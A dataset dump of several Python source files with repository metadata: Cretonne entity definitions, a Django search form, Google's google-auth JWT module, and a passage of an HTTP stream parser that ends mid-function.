text
stringlengths 4
1.02M
| meta
dict |
|---|---|
"""
The `cretonne.entities` module predefines all the Cretonne entity reference
operand types. There are corresponding definitions in the `cretonne.entities`
Rust module.
"""
from __future__ import absolute_import
from cdsl.operands import EntityRefKind
#: A reference to an extended basic block in the same function.
#: This is primarliy used in control flow instructions.
ebb = EntityRefKind(
'ebb', 'An extended basic block in the same function.',
default_member='destination')
#: A reference to a stack slot declared in the function preamble.
stack_slot = EntityRefKind('stack_slot', 'A stack slot.')
#: A reference to a global variable.
global_var = EntityRefKind('global_var', 'A global variable.')
#: A reference to a function sugnature declared in the function preamble.
#: Tbis is used to provide the call signature in an indirect call instruction.
sig_ref = EntityRefKind('sig_ref', 'A function signature.')
#: A reference to an external function declared in the function preamble.
#: This is used to provide the callee and signature in a call instruction.
func_ref = EntityRefKind('func_ref', 'An external function.')
#: A reference to a jump table declared in the function preamble.
jump_table = EntityRefKind(
'jump_table', 'A jump table.', default_member='table')
#: A reference to a heap declared in the function preamble.
heap = EntityRefKind('heap', 'A heap.')
|
{
"content_hash": "3c862af6b2e13c5099b835890a4a03bc",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 78,
"avg_line_length": 40.285714285714285,
"alnum_prop": 0.7446808510638298,
"repo_name": "sunfishcode/cretonne",
"id": "614b4d6284d8862d6339956c750704a7a6a305a3",
"size": "1410",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/cretonne/meta/base/entities.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "575579"
},
{
"name": "Rust",
"bytes": "1675777"
},
{
"name": "Shell",
"bytes": "5642"
},
{
"name": "Vim script",
"bytes": "1505"
},
{
"name": "WebAssembly",
"bytes": "3548"
}
],
"symlink_target": ""
}
|
from django import forms
from haystack.forms import SearchForm
class DateRangeSearchForm(SearchForm):
start_date = forms.DateField(required=False)
end_date = forms.DateField(required=False)
def search(self):
# First, store the SearchQuerySet received from other processing.
sqs = super(DateRangeSearchForm, self).search()
if not self.is_valid():
return self.no_query_found()
# Check to see if a start_date was chosen.
if self.cleaned_data['start_date']:
sqs = sqs.filter(pub_date__gte=self.cleaned_data['start_date'])
# Check to see if an end_date was chosen.
if self.cleaned_data['end_date']:
sqs = sqs.filter(pub_date__lte=self.cleaned_data['end_date'])
return sqs
|
{
"content_hash": "69aaa570192cb3b87042c09e2176f1a0",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 75,
"avg_line_length": 32.75,
"alnum_prop": 0.648854961832061,
"repo_name": "mmitucha/blavanet-web",
"id": "de318214500389266a45affab79e61a27f1a5ccb",
"size": "786",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blog/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1476"
},
{
"name": "HTML",
"bytes": "19788"
},
{
"name": "JavaScript",
"bytes": "9509"
},
{
"name": "Python",
"bytes": "15955"
}
],
"symlink_target": ""
}
|
"""JSON Web Tokens
Provides support for creating (encoding) and verifying (decoding) JWTs,
especially JWTs generated and consumed by Google infrastructure.
See `rfc7519`_ for more details on JWTs.
To encode a JWT use :func:`encode`::
from google.auth import crypt
from google.auth import jwt
signer = crypt.Signer(private_key)
payload = {'some': 'payload'}
encoded = jwt.encode(signer, payload)
To decode a JWT and verify claims use :func:`decode`::
claims = jwt.decode(encoded, certs=public_certs)
You can also skip verification::
claims = jwt.decode(encoded, verify=False)
.. _rfc7519: https://tools.ietf.org/html/rfc7519
"""
try:
from collections.abc import Mapping
# Python 2.7 compatibility
except ImportError: # pragma: NO COVER
from collections import Mapping
import copy
import datetime
import json
import cachetools
import six
from six.moves import urllib
from google.auth import _helpers
from google.auth import _service_account_info
from google.auth import crypt
from google.auth import exceptions
import google.auth.credentials
try:
from google.auth.crypt import es256
except ImportError: # pragma: NO COVER
es256 = None
_DEFAULT_TOKEN_LIFETIME_SECS = 3600 # 1 hour in seconds
_DEFAULT_MAX_CACHE_SIZE = 10
_ALGORITHM_TO_VERIFIER_CLASS = {"RS256": crypt.RSAVerifier}
_CRYPTOGRAPHY_BASED_ALGORITHMS = frozenset(["ES256"])
if es256 is not None: # pragma: NO COVER
_ALGORITHM_TO_VERIFIER_CLASS["ES256"] = es256.ES256Verifier
def encode(signer, payload, header=None, key_id=None):
"""Make a signed JWT.
Args:
signer (google.auth.crypt.Signer): The signer used to sign the JWT.
payload (Mapping[str, str]): The JWT payload.
header (Mapping[str, str]): Additional JWT header payload.
key_id (str): The key id to add to the JWT header. If the
signer has a key id it will be used as the default. If this is
specified it will override the signer's key id.
Returns:
bytes: The encoded JWT.
"""
if header is None:
header = {}
if key_id is None:
key_id = signer.key_id
header.update({"typ": "JWT"})
if es256 is not None and isinstance(signer, es256.ES256Signer):
header.update({"alg": "ES256"})
else:
header.update({"alg": "RS256"})
if key_id is not None:
header["kid"] = key_id
segments = [
_helpers.unpadded_urlsafe_b64encode(json.dumps(header).encode("utf-8")),
_helpers.unpadded_urlsafe_b64encode(json.dumps(payload).encode("utf-8")),
]
signing_input = b".".join(segments)
signature = signer.sign(signing_input)
segments.append(_helpers.unpadded_urlsafe_b64encode(signature))
return b".".join(segments)
def _decode_jwt_segment(encoded_section):
"""Decodes a single JWT segment."""
section_bytes = _helpers.padded_urlsafe_b64decode(encoded_section)
try:
return json.loads(section_bytes.decode("utf-8"))
except ValueError as caught_exc:
new_exc = ValueError("Can't parse segment: {0}".format(section_bytes))
six.raise_from(new_exc, caught_exc)
def _unverified_decode(token):
"""Decodes a token and does no verification.
Args:
token (Union[str, bytes]): The encoded JWT.
Returns:
Tuple[str, str, str, str]: header, payload, signed_section, and
signature.
Raises:
ValueError: if there are an incorrect amount of segments in the token.
"""
token = _helpers.to_bytes(token)
if token.count(b".") != 2:
raise ValueError("Wrong number of segments in token: {0}".format(token))
encoded_header, encoded_payload, signature = token.split(b".")
signed_section = encoded_header + b"." + encoded_payload
signature = _helpers.padded_urlsafe_b64decode(signature)
# Parse segments
header = _decode_jwt_segment(encoded_header)
payload = _decode_jwt_segment(encoded_payload)
return header, payload, signed_section, signature
def decode_header(token):
"""Return the decoded header of a token.
No verification is done. This is useful to extract the key id from
the header in order to acquire the appropriate certificate to verify
the token.
Args:
token (Union[str, bytes]): the encoded JWT.
Returns:
Mapping: The decoded JWT header.
"""
header, _, _, _ = _unverified_decode(token)
return header
def _verify_iat_and_exp(payload):
"""Verifies the ``iat`` (Issued At) and ``exp`` (Expires) claims in a token
payload.
Args:
payload (Mapping[str, str]): The JWT payload.
Raises:
ValueError: if any checks failed.
"""
now = _helpers.datetime_to_secs(_helpers.utcnow())
# Make sure the iat and exp claims are present.
for key in ("iat", "exp"):
if key not in payload:
raise ValueError("Token does not contain required claim {}".format(key))
# Make sure the token wasn't issued in the future.
iat = payload["iat"]
# Err on the side of accepting a token that is slightly early to account
# for clock skew.
earliest = iat - _helpers.CLOCK_SKEW_SECS
if now < earliest:
raise ValueError("Token used too early, {} < {}".format(now, iat))
# Make sure the token wasn't issued in the past.
exp = payload["exp"]
# Err on the side of accepting a token that is slightly out of date
# to account for clow skew.
latest = exp + _helpers.CLOCK_SKEW_SECS
if latest < now:
raise ValueError("Token expired, {} < {}".format(latest, now))
def decode(token, certs=None, verify=True, audience=None):
"""Decode and verify a JWT.
Args:
token (str): The encoded JWT.
certs (Union[str, bytes, Mapping[str, Union[str, bytes]]]): The
certificate used to validate the JWT signature. If bytes or string,
it must the the public key certificate in PEM format. If a mapping,
it must be a mapping of key IDs to public key certificates in PEM
format. The mapping must contain the same key ID that's specified
in the token's header.
verify (bool): Whether to perform signature and claim validation.
Verification is done by default.
audience (str): The audience claim, 'aud', that this JWT should
contain. If None then the JWT's 'aud' parameter is not verified.
Returns:
Mapping[str, str]: The deserialized JSON payload in the JWT.
Raises:
ValueError: if any verification checks failed.
"""
header, payload, signed_section, signature = _unverified_decode(token)
if not verify:
return payload
# Pluck the key id and algorithm from the header and make sure we have
# a verifier that can support it.
key_alg = header.get("alg")
key_id = header.get("kid")
try:
verifier_cls = _ALGORITHM_TO_VERIFIER_CLASS[key_alg]
except KeyError as exc:
if key_alg in _CRYPTOGRAPHY_BASED_ALGORITHMS:
six.raise_from(
ValueError(
"The key algorithm {} requires the cryptography package "
"to be installed.".format(key_alg)
),
exc,
)
else:
six.raise_from(
ValueError("Unsupported signature algorithm {}".format(key_alg)), exc
)
# If certs is specified as a dictionary of key IDs to certificates, then
# use the certificate identified by the key ID in the token header.
if isinstance(certs, Mapping):
if key_id:
if key_id not in certs:
raise ValueError("Certificate for key id {} not found.".format(key_id))
certs_to_check = [certs[key_id]]
# If there's no key id in the header, check against all of the certs.
else:
certs_to_check = certs.values()
else:
certs_to_check = certs
# Verify that the signature matches the message.
if not crypt.verify_signature(
signed_section, signature, certs_to_check, verifier_cls
):
raise ValueError("Could not verify token signature.")
# Verify the issued at and created times in the payload.
_verify_iat_and_exp(payload)
# Check audience.
if audience is not None:
claim_audience = payload.get("aud")
if audience != claim_audience:
raise ValueError(
"Token has wrong audience {}, expected {}".format(
claim_audience, audience
)
)
return payload
class Credentials(
google.auth.credentials.Signing, google.auth.credentials.CredentialsWithQuotaProject
):
"""Credentials that use a JWT as the bearer token.
These credentials require an "audience" claim. This claim identifies the
intended recipient of the bearer token.
The constructor arguments determine the claims for the JWT that is
sent with requests. Usually, you'll construct these credentials with
one of the helper constructors as shown in the next section.
To create JWT credentials using a Google service account private key
JSON file::
audience = 'https://pubsub.googleapis.com/google.pubsub.v1.Publisher'
credentials = jwt.Credentials.from_service_account_file(
'service-account.json',
audience=audience)
If you already have the service account file loaded and parsed::
service_account_info = json.load(open('service_account.json'))
credentials = jwt.Credentials.from_service_account_info(
service_account_info,
audience=audience)
Both helper methods pass on arguments to the constructor, so you can
specify the JWT claims::
credentials = jwt.Credentials.from_service_account_file(
'service-account.json',
audience=audience,
additional_claims={'meta': 'data'})
You can also construct the credentials directly if you have a
:class:`~google.auth.crypt.Signer` instance::
credentials = jwt.Credentials(
signer,
issuer='your-issuer',
subject='your-subject',
audience=audience)
The claims are considered immutable. If you want to modify the claims,
you can easily create another instance using :meth:`with_claims`::
new_audience = (
'https://pubsub.googleapis.com/google.pubsub.v1.Subscriber')
new_credentials = credentials.with_claims(audience=new_audience)
"""
def __init__(
self,
signer,
issuer,
subject,
audience,
additional_claims=None,
token_lifetime=_DEFAULT_TOKEN_LIFETIME_SECS,
quota_project_id=None,
):
"""
Args:
signer (google.auth.crypt.Signer): The signer used to sign JWTs.
issuer (str): The `iss` claim.
subject (str): The `sub` claim.
audience (str): the `aud` claim. The intended audience for the
credentials.
additional_claims (Mapping[str, str]): Any additional claims for
the JWT payload.
token_lifetime (int): The amount of time in seconds for
which the token is valid. Defaults to 1 hour.
quota_project_id (Optional[str]): The project ID used for quota
and billing.
"""
super(Credentials, self).__init__()
self._signer = signer
self._issuer = issuer
self._subject = subject
self._audience = audience
self._token_lifetime = token_lifetime
self._quota_project_id = quota_project_id
if additional_claims is None:
additional_claims = {}
self._additional_claims = additional_claims
@classmethod
def _from_signer_and_info(cls, signer, info, **kwargs):
"""Creates a Credentials instance from a signer and service account
info.
Args:
signer (google.auth.crypt.Signer): The signer used to sign JWTs.
info (Mapping[str, str]): The service account info.
kwargs: Additional arguments to pass to the constructor.
Returns:
google.auth.jwt.Credentials: The constructed credentials.
Raises:
ValueError: If the info is not in the expected format.
"""
kwargs.setdefault("subject", info["client_email"])
kwargs.setdefault("issuer", info["client_email"])
return cls(signer, **kwargs)
@classmethod
def from_service_account_info(cls, info, **kwargs):
"""Creates an Credentials instance from a dictionary.
Args:
info (Mapping[str, str]): The service account info in Google
format.
kwargs: Additional arguments to pass to the constructor.
Returns:
google.auth.jwt.Credentials: The constructed credentials.
Raises:
ValueError: If the info is not in the expected format.
"""
signer = _service_account_info.from_dict(info, require=["client_email"])
return cls._from_signer_and_info(signer, info, **kwargs)
@classmethod
def from_service_account_file(cls, filename, **kwargs):
"""Creates a Credentials instance from a service account .json file
in Google format.
Args:
filename (str): The path to the service account .json file.
kwargs: Additional arguments to pass to the constructor.
Returns:
google.auth.jwt.Credentials: The constructed credentials.
"""
info, signer = _service_account_info.from_filename(
filename, require=["client_email"]
)
return cls._from_signer_and_info(signer, info, **kwargs)
@classmethod
def from_signing_credentials(cls, credentials, audience, **kwargs):
"""Creates a new :class:`google.auth.jwt.Credentials` instance from an
existing :class:`google.auth.credentials.Signing` instance.
The new instance will use the same signer as the existing instance and
will use the existing instance's signer email as the issuer and
subject by default.
Example::
svc_creds = service_account.Credentials.from_service_account_file(
'service_account.json')
audience = (
'https://pubsub.googleapis.com/google.pubsub.v1.Publisher')
jwt_creds = jwt.Credentials.from_signing_credentials(
svc_creds, audience=audience)
Args:
credentials (google.auth.credentials.Signing): The credentials to
use to construct the new credentials.
audience (str): the `aud` claim. The intended audience for the
credentials.
kwargs: Additional arguments to pass to the constructor.
Returns:
google.auth.jwt.Credentials: A new Credentials instance.
"""
kwargs.setdefault("issuer", credentials.signer_email)
kwargs.setdefault("subject", credentials.signer_email)
return cls(credentials.signer, audience=audience, **kwargs)
def with_claims(
self, issuer=None, subject=None, audience=None, additional_claims=None
):
"""Returns a copy of these credentials with modified claims.
Args:
issuer (str): The `iss` claim. If unspecified the current issuer
claim will be used.
subject (str): The `sub` claim. If unspecified the current subject
claim will be used.
audience (str): the `aud` claim. If unspecified the current
audience claim will be used.
additional_claims (Mapping[str, str]): Any additional claims for
the JWT payload. This will be merged with the current
additional claims.
Returns:
google.auth.jwt.Credentials: A new credentials instance.
"""
new_additional_claims = copy.deepcopy(self._additional_claims)
new_additional_claims.update(additional_claims or {})
return self.__class__(
self._signer,
issuer=issuer if issuer is not None else self._issuer,
subject=subject if subject is not None else self._subject,
audience=audience if audience is not None else self._audience,
additional_claims=new_additional_claims,
quota_project_id=self._quota_project_id,
)
@_helpers.copy_docstring(google.auth.credentials.CredentialsWithQuotaProject)
def with_quota_project(self, quota_project_id):
return self.__class__(
self._signer,
issuer=self._issuer,
subject=self._subject,
audience=self._audience,
additional_claims=self._additional_claims,
quota_project_id=quota_project_id,
)
def _make_jwt(self):
"""Make a signed JWT.
Returns:
Tuple[bytes, datetime]: The encoded JWT and the expiration.
"""
now = _helpers.utcnow()
lifetime = datetime.timedelta(seconds=self._token_lifetime)
expiry = now + lifetime
payload = {
"iss": self._issuer,
"sub": self._subject,
"iat": _helpers.datetime_to_secs(now),
"exp": _helpers.datetime_to_secs(expiry),
"aud": self._audience,
}
payload.update(self._additional_claims)
jwt = encode(self._signer, payload)
return jwt, expiry
def refresh(self, request):
"""Refreshes the access token.
Args:
request (Any): Unused.
"""
# pylint: disable=unused-argument
# (pylint doesn't correctly recognize overridden methods.)
self.token, self.expiry = self._make_jwt()
@_helpers.copy_docstring(google.auth.credentials.Signing)
def sign_bytes(self, message):
return self._signer.sign(message)
@property
@_helpers.copy_docstring(google.auth.credentials.Signing)
def signer_email(self):
return self._issuer
@property
@_helpers.copy_docstring(google.auth.credentials.Signing)
def signer(self):
return self._signer
class OnDemandCredentials(
google.auth.credentials.Signing, google.auth.credentials.CredentialsWithQuotaProject
):
"""On-demand JWT credentials.
Like :class:`Credentials`, this class uses a JWT as the bearer token for
authentication. However, this class does not require the audience at
construction time. Instead, it will generate a new token on-demand for
each request using the request URI as the audience. It caches tokens
so that multiple requests to the same URI do not incur the overhead
of generating a new token every time.
This behavior is especially useful for `gRPC`_ clients. A gRPC service may
have multiple audience and gRPC clients may not know all of the audiences
required for accessing a particular service. With these credentials,
no knowledge of the audiences is required ahead of time.
.. _grpc: http://www.grpc.io/
"""
def __init__(
self,
signer,
issuer,
subject,
additional_claims=None,
token_lifetime=_DEFAULT_TOKEN_LIFETIME_SECS,
max_cache_size=_DEFAULT_MAX_CACHE_SIZE,
quota_project_id=None,
):
"""
Args:
signer (google.auth.crypt.Signer): The signer used to sign JWTs.
issuer (str): The `iss` claim.
subject (str): The `sub` claim.
additional_claims (Mapping[str, str]): Any additional claims for
the JWT payload.
token_lifetime (int): The amount of time in seconds for
which the token is valid. Defaults to 1 hour.
max_cache_size (int): The maximum number of JWT tokens to keep in
cache. Tokens are cached using :class:`cachetools.LRUCache`.
quota_project_id (Optional[str]): The project ID used for quota
and billing.
"""
super(OnDemandCredentials, self).__init__()
self._signer = signer
self._issuer = issuer
self._subject = subject
self._token_lifetime = token_lifetime
self._quota_project_id = quota_project_id
if additional_claims is None:
additional_claims = {}
self._additional_claims = additional_claims
self._cache = cachetools.LRUCache(maxsize=max_cache_size)
@classmethod
def _from_signer_and_info(cls, signer, info, **kwargs):
"""Creates an OnDemandCredentials instance from a signer and service
account info.
Args:
signer (google.auth.crypt.Signer): The signer used to sign JWTs.
info (Mapping[str, str]): The service account info.
kwargs: Additional arguments to pass to the constructor.
Returns:
google.auth.jwt.OnDemandCredentials: The constructed credentials.
Raises:
ValueError: If the info is not in the expected format.
"""
kwargs.setdefault("subject", info["client_email"])
kwargs.setdefault("issuer", info["client_email"])
return cls(signer, **kwargs)
@classmethod
def from_service_account_info(cls, info, **kwargs):
"""Creates an OnDemandCredentials instance from a dictionary.
Args:
info (Mapping[str, str]): The service account info in Google
format.
kwargs: Additional arguments to pass to the constructor.
Returns:
google.auth.jwt.OnDemandCredentials: The constructed credentials.
Raises:
ValueError: If the info is not in the expected format.
"""
signer = _service_account_info.from_dict(info, require=["client_email"])
return cls._from_signer_and_info(signer, info, **kwargs)
@classmethod
def from_service_account_file(cls, filename, **kwargs):
"""Creates an OnDemandCredentials instance from a service account .json
file in Google format.
Args:
filename (str): The path to the service account .json file.
kwargs: Additional arguments to pass to the constructor.
Returns:
google.auth.jwt.OnDemandCredentials: The constructed credentials.
"""
info, signer = _service_account_info.from_filename(
filename, require=["client_email"]
)
return cls._from_signer_and_info(signer, info, **kwargs)
@classmethod
def from_signing_credentials(cls, credentials, **kwargs):
"""Creates a new :class:`google.auth.jwt.OnDemandCredentials` instance
from an existing :class:`google.auth.credentials.Signing` instance.
The new instance will use the same signer as the existing instance and
will use the existing instance's signer email as the issuer and
subject by default.
Example::
svc_creds = service_account.Credentials.from_service_account_file(
'service_account.json')
jwt_creds = jwt.OnDemandCredentials.from_signing_credentials(
svc_creds)
Args:
credentials (google.auth.credentials.Signing): The credentials to
use to construct the new credentials.
kwargs: Additional arguments to pass to the constructor.
Returns:
google.auth.jwt.Credentials: A new Credentials instance.
"""
kwargs.setdefault("issuer", credentials.signer_email)
kwargs.setdefault("subject", credentials.signer_email)
return cls(credentials.signer, **kwargs)
def with_claims(self, issuer=None, subject=None, additional_claims=None):
"""Returns a copy of these credentials with modified claims.
Args:
issuer (str): The `iss` claim. If unspecified the current issuer
claim will be used.
subject (str): The `sub` claim. If unspecified the current subject
claim will be used.
additional_claims (Mapping[str, str]): Any additional claims for
the JWT payload. This will be merged with the current
additional claims.
Returns:
google.auth.jwt.OnDemandCredentials: A new credentials instance.
"""
new_additional_claims = copy.deepcopy(self._additional_claims)
new_additional_claims.update(additional_claims or {})
return self.__class__(
self._signer,
issuer=issuer if issuer is not None else self._issuer,
subject=subject if subject is not None else self._subject,
additional_claims=new_additional_claims,
max_cache_size=self._cache.maxsize,
quota_project_id=self._quota_project_id,
)
@_helpers.copy_docstring(google.auth.credentials.CredentialsWithQuotaProject)
def with_quota_project(self, quota_project_id):
return self.__class__(
self._signer,
issuer=self._issuer,
subject=self._subject,
additional_claims=self._additional_claims,
max_cache_size=self._cache.maxsize,
quota_project_id=quota_project_id,
)
@property
def valid(self):
"""Checks the validity of the credentials.
These credentials are always valid because it generates tokens on
demand.
"""
return True
def _make_jwt_for_audience(self, audience):
"""Make a new JWT for the given audience.
Args:
audience (str): The intended audience.
Returns:
Tuple[bytes, datetime]: The encoded JWT and the expiration.
"""
now = _helpers.utcnow()
lifetime = datetime.timedelta(seconds=self._token_lifetime)
expiry = now + lifetime
payload = {
"iss": self._issuer,
"sub": self._subject,
"iat": _helpers.datetime_to_secs(now),
"exp": _helpers.datetime_to_secs(expiry),
"aud": audience,
}
payload.update(self._additional_claims)
jwt = encode(self._signer, payload)
return jwt, expiry
def _get_jwt_for_audience(self, audience):
"""Get a JWT For a given audience.
If there is already an existing, non-expired token in the cache for
the audience, that token is used. Otherwise, a new token will be
created.
Args:
audience (str): The intended audience.
Returns:
bytes: The encoded JWT.
"""
token, expiry = self._cache.get(audience, (None, None))
if token is None or expiry < _helpers.utcnow():
token, expiry = self._make_jwt_for_audience(audience)
self._cache[audience] = token, expiry
return token
def refresh(self, request):
"""Raises an exception, these credentials can not be directly
refreshed.
Args:
request (Any): Unused.
Raises:
google.auth.RefreshError
"""
# pylint: disable=unused-argument
# (pylint doesn't correctly recognize overridden methods.)
raise exceptions.RefreshError(
"OnDemandCredentials can not be directly refreshed."
)
def before_request(self, request, method, url, headers):
"""Performs credential-specific before request logic.
Args:
request (Any): Unused. JWT credentials do not need to make an
HTTP request to refresh.
method (str): The request's HTTP method.
url (str): The request's URI. This is used as the audience claim
when generating the JWT.
headers (Mapping): The request's headers.
"""
# pylint: disable=unused-argument
# (pylint doesn't correctly recognize overridden methods.)
parts = urllib.parse.urlsplit(url)
# Strip query string and fragment
audience = urllib.parse.urlunsplit(
(parts.scheme, parts.netloc, parts.path, "", "")
)
token = self._get_jwt_for_audience(audience)
self.apply(headers, token=token)
@_helpers.copy_docstring(google.auth.credentials.Signing)
def sign_bytes(self, message):
return self._signer.sign(message)
@property
@_helpers.copy_docstring(google.auth.credentials.Signing)
def signer_email(self):
return self._issuer
@property
@_helpers.copy_docstring(google.auth.credentials.Signing)
def signer(self):
return self._signer
|
{
"content_hash": "d85d40ecd7f5c00bd10c37e6839a9567",
"timestamp": "",
"source": "github",
"line_count": 830,
"max_line_length": 88,
"avg_line_length": 34.65421686746988,
"alnum_prop": 0.6251434134130655,
"repo_name": "javier-ruiz-b/docker-rasppi-images",
"id": "a4f04f529e039d74a8e8dd388e0ce9d14fe3a146",
"size": "29339",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "raspberry-google-home/env/lib/python3.7/site-packages/google/auth/jwt.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "15254"
},
{
"name": "PHP",
"bytes": "1132"
},
{
"name": "Shell",
"bytes": "17522"
}
],
"symlink_target": ""
}
|
"""A set of stream oriented parsers for http requests and responses, inline
with the current draft recommendations from the http working group.
http://tools.ietf.org/html/draft-ietf-httpbis-p1-messaging-17
Unlike other libraries, this is for clients, servers and proxies.
Missing:
comma parsing/header folding
"""
import re
import zlib
class ParseError(StandardError):
"""Baseclass for all http parsing errors"""
pass
from hanzo.httptools.semantics import Codes, Methods
NEWLINES = ('\r\n', '\n')
class HTTPMessage(object):
"""A stream based parser for http like messages"""
CONTENT_TYPE = "application/http"
def __init__(self, header):
self.buffer = bytearray()
self.offset = 0
self.header = header
self.body_chunks = []
self.mode = 'start'
self.body_reader = None
@property
def url(self):
return self.header.url
@property
def scheme(self):
return self.header.scheme
@property
def method(self):
return self.header.method
@property
def host(self):
return self.header.host
@property
def port(self):
return self.header.port
def feed_fd(self, fd):
while True:
length, terminator = self.feed_predict()
if length == 0:
return ''
elif terminator == '\r\n':
text = fd.readLine()
elif length < 0:
text = fd.read()
elif length > 0:
text = fd.read(length)
unread = self.feed(text)
if unread:
return unread
def feed_predict(self):
"""returns size, terminator request for input. size is 0 means end. """
if self.mode == 'start':
return None, '\r\n'
elif self.mode == 'headers':
return None, '\r\n'
elif self.mode == 'body':
if self.body_reader is not None:
return self.body_reader.feed_predict()
else:
# connection close
return -1, None
if self.mode == 'end':
return 0, None
if self.mode == 'incomplete':
return 0, None
def feed(self, text):
"""Push more text from the input stream into the parser."""
if text and self.mode == 'start':
text = self.feed_start(text)
if text and self.mode == 'headers':
text = self.feed_headers(text)
if self.mode == 'body':
if not self.header.has_body():
self.mode = 'end'
else:
if self.header.body_is_chunked():
self.body_reader = ChunkReader()
else:
length = self.header.body_length()
if length >= 0:
self.body_reader = LengthReader(length)
self.body_chunks = [(self.offset, length)]
if length == 0:
self.mode = 'end'
else:
self.body_chunks = [(self.offset, 0)]
self.body_reader = None
if text and self.mode == 'body':
if self.body_reader is not None:
#print >> sys.stderr, 'feeding', text[:50]
text = self.body_reader.feed(self, text)
else:
((offset, length),) = self.body_chunks
self.buffer.extend(text)
self.offset = len(self.buffer)
self.body_chunks = ((offset, length + len(text)),)
text = ''
return text
def close(self):
"""Mark the end of the input stream and finish parsing."""
if (self.body_reader is None and self.mode == 'body'):
self.mode = 'end'
elif self.mode != 'end':
if self.body_chunks:
# check for incomplete in body_chunks
offset, length = self.body_chunks.pop()
position = len(self.buffer)
length = min(length, position - offset)
self.body_chunks.append((offset, length))
self.mode = 'incomplete'
def headers_complete(self):
"""Check whether the input stream has finished supplying headers."""
return self.mode in ('end', 'body')
def complete(self):
"""Checks whether the input stream is at the end, i.e. if the parser
is expecting no more input."""
return self.mode == 'end'
def feed_line(self, text):
"""Feed text into the buffer, returning the first line found (if found
yet)"""
self.buffer.extend(text)
pos = self.buffer.find('\n', self.offset)
if pos > -1:
pos += 1
text = str(self.buffer[pos:])
del self.buffer[pos:]
line = str(self.buffer[self.offset:])
self.offset = len(self.buffer)
else:
line = None
text = ''
return line, text
def feed_length(self, text, remaining):
"""Feed (at most remaining bytes) text to buffer, returning
leftovers."""
body, text = text[:remaining], text[remaining:]
remaining -= len(body)
self.buffer.extend(body)
self.offset = len(self.buffer)
return remaining, text
def feed_start(self, text):
"""Feed text to the parser while it is in the 'start' state."""
line, text = self.feed_line(text)
if line is not None:
if line not in NEWLINES:
self.header.set_start_line(line)
self.mode = 'headers'
return text
def feed_headers(self, text):
"""Feed text to the parser while it is in the 'headers'
state."""
while text:
line, text = self.feed_line(text)
if line is not None:
self.header.add_header_line(line)
if line in NEWLINES:
self.mode = 'body'
break
return text
def get_message(self):
"""Returns the contents of the input buffer."""
return str(self.buffer)
def get_decoded_message(self):
"""Return the input stream reconstructed from the parsed
data."""
buf = bytearray()
self.write_decoded_message(buf)
return str(buf)
def write_message(self, buf):
#TODO: No idea what this does, looks broken
self.header.write(buf)
buf.extend('\r\n')
self.write_body(buf)
def write_decoded_message(self, buf):
"""Writes the parsed data to the buffer passed."""
self.header.write_decoded(buf)
if self.header.has_body():
length = sum(l for o, l in self.body_chunks)
buf.extend('Content-Length: %d\r\n' % length)
body = self.get_body()
if self.header.encoding and body:
try:
body = zlib.decompress(body)
except zlib.error:
try:
body = zlib.decompress(body, 16 + zlib.MAX_WBITS)
except zlib.error:
encoding_header = "Content-Encoding: %s\r\n" \
% self.header.encoding
buf.extend(encoding_header)
buf.extend('\r\n')
buf.extend(body)
def get_body(self):
"""Returns the body of the HTTP message."""
buf = bytearray()
self.write_body(buf)
return str(buf)
def write_body(self, buf):
"""Writes the body of the HTTP message to the passed
buffer."""
for offset, length in self.body_chunks:
buf.extend(self.buffer[offset:offset + length])
class ChunkReader(object):
"""Reads the body of a HTTP message with chunked encoding."""
def __init__(self):
self.mode = "start"
self.remaining = 0
def feed_predict(self):
if self.mode == 'start':
return None, '\r\n'
elif self.mode == 'chunk':
if self.remaining == 0:
return None, '\r\n'
else:
return self.remaining, None
elif self.mode == 'trailer':
return None, '\r\n'
elif self.mode == 'end':
return 0, None
def feed_start(self, parser, text):
"""Feed text into the ChunkReader when the mode is 'start'."""
line, text = parser.feed_line(text)
offset = len(parser.buffer)
if line is not None:
chunk = int(line.split(';', 1)[0], 16)
parser.body_chunks.append((offset, chunk))
self.remaining = chunk
if chunk == 0:
self.mode = 'trailer'
else:
self.mode = 'chunk'
return text
def feed_chunk(self, parser, text):
"""Feed text into the ChunkReader when the mode is 'chunk'."""
if self.remaining > 0:
self.remaining, text = parser.feed_length(text, self.remaining)
if self.remaining == 0:
end_of_chunk, text = parser.feed_line(text)
if end_of_chunk:
self.mode = 'start'
return text
def feed_trailer(self, parser, text):
"""Feed text into the ChunkReader when the mode is
'trailer'."""
line, text = parser.feed_line(text)
if line is not None:
parser.header.add_trailer_line(line)
if line in NEWLINES:
self.mode = 'end'
return text
def feed(self, parser, text):
"""Feed text into the ChunkReader."""
while text:
if self.mode == 'start':
text = self.feed_start(parser, text)
if text and self.mode == 'chunk':
text = self.feed_chunk(parser, text)
if text and self.mode == 'trailer':
text = self.feed_trailer(parser, text)
if self.mode == 'end':
parser.mode = 'end'
break
return text
class LengthReader(object):
def __init__(self, length):
self.remaining = length
def feed_predict(self):
return self.remaining, None
def feed(self, parser, text):
if self.remaining > 0:
self.remaining, text = parser.feed_length(text, self.remaining)
if self.remaining <= 0:
parser.mode = 'end'
return text
class HTTPHeader(object):
STRIP_HEADERS = ('Content-Length', 'Transfer-Encoding', 'Content-Encoding',
'TE', 'Expect', 'Trailer')
def __init__(self, ignore_headers):
self.headers = []
self.keep_alive = False
self.mode = 'close'
self.content_length = None
self.encoding = None
self.trailers = []
self.expect_continue = False
self.ignore_headers = set(x.lower() for x in ignore_headers)
def has_body(self):
pass
def set_start_line(self, line):
pass
def write_decoded(self, buf):
self.write_decoded_start(buf)
strip_headers = self.STRIP_HEADERS if self.has_body() else ()
self.write_headers(buf, strip_headers)
def write_decoded_start(self, buf):
pass
def write_headers(self, buf, strip_headers=()):
for k, v in self.headers:
if k not in strip_headers:
buf.extend('%s: %s\r\n' % (k, v))
for k, v in self.trailers:
if k not in strip_headers:
buf.extend('%s: %s\r\n' % (k, v))
def add_trailer_line(self, line):
if line.startswith(' ') or line.startswith('\t'):
k, v = self.trailers.pop()
line = line.strip()
v = "%s %s" % (v, line)
self.trailers.append((k, v))
elif line in NEWLINES:
pass
else:
